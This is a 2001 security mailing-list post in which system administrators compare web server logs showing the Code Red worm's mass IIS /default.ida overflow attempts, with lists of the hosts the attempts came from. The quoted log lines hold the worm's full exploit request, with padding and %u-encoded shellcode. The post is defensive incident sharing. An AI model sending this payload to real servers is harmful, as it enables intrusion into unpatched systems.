[unisog] ida worm (fwd)

Bencsath Boldizsar boldi at budapest.hu
Thu Jul 19 20:30:50 GMT 2001


Tons of them on all servers (low traffic ones too...)
The first could be 63.64.108.6 - - [19/Jul/2001:16:46:20 +0200]


65.164.0.68 - - [19/Jul/2001:17:56:22 +0200] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%
ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0
" 400 327 "-" "-"
209.195.169.242 - - [19/Jul/2001:17:57:52 +0200] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6
858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
...
some hostnames:
63.64.108.6--[19/Jul/2001:16:46:20
www.carle.com--[19/Jul/2001:18:22:34
ip-90-027.gst.pe.net--[19/Jul/2001:18:47:08
65.4.216.136--[19/Jul/2001:19:03:48
dsl-641491397.internetconnect.net--[19/Jul/2001:19:15:22
nr12-216-196-181-11.fuse.net--[19/Jul/2001:20:05:36
www.kclifesciences.org--[19/Jul/2001:20:07:46
cm030.167.234.24.lvcm.com--[19/Jul/2001:20:39:20
dyn-213-36-2-65.ppp.libertysurf.fr--[19/Jul/2001:20:56:03
208.239.158.118--[19/Jul/2001:21:18:28
61.128.97.77--[19/Jul/2001:22:14:38


--------------------------------
Bencsath Boldizsar
boldi at etl.hu
--------------------------------

On Thu, 19 Jul 2001, Russ Harvey wrote:

>
> http://www.eeye.com/html/Research/Advisories/AD20010618.html
>
> We're getting hit with a ton of these, and the source IPs seem all over
> the map:
>
> Thu Jul 19 08:33:06    HTTP request from 207.46.239.116: GET /default.ida?NN...
> Thu Jul 19 08:53:17    HTTP request from 211.220.44.29: GET /default.ida?NN...
> Thu Jul 19 09:26:38    HTTP request from 63.237.136.164: GET /default.ida?NN...
> Thu Jul 19 09:33:14    HTTP request from 217.12.96.66: GET /default.ida?NN...
> Thu Jul 19 10:00:43    HTTP request from 210.218.214.10: GET /default.ida?NN...
> Thu Jul 19 10:05:05    HTTP request from 63.165.102.41: GET /default.ida?NN...
> Thu Jul 19 10:40:26    HTTP request from 66.1.160.222: GET /default.ida?NN...
> Thu Jul 19 10:51:14    HTTP request from 61.155.18.78: GET /default.ida?NN...
> Thu Jul 19 10:51:53    HTTP request from 211.173.199.28: GET /default.ida?NN...
> Thu Jul 19 11:01:18    HTTP request from 216.114.79.35: GET /default.ida?NN...
> Thu Jul 19 11:01:57    HTTP request from 209.113.64.211: GET /default.ida?NN...
>
> Anyone else getting barraged?
>
> Thanks,
> --russ
>
> -------------------------------------------------------------------------------
> Russ Harvey                             Internet: russ-harvey at ucr.edu
> Dept. of Computing and Communications       uucp: galaxy!russ
> Univ. of Calif., Riverside, CA 92521-0142  phone: (909) 787-5617
>




More information about the unisog mailing list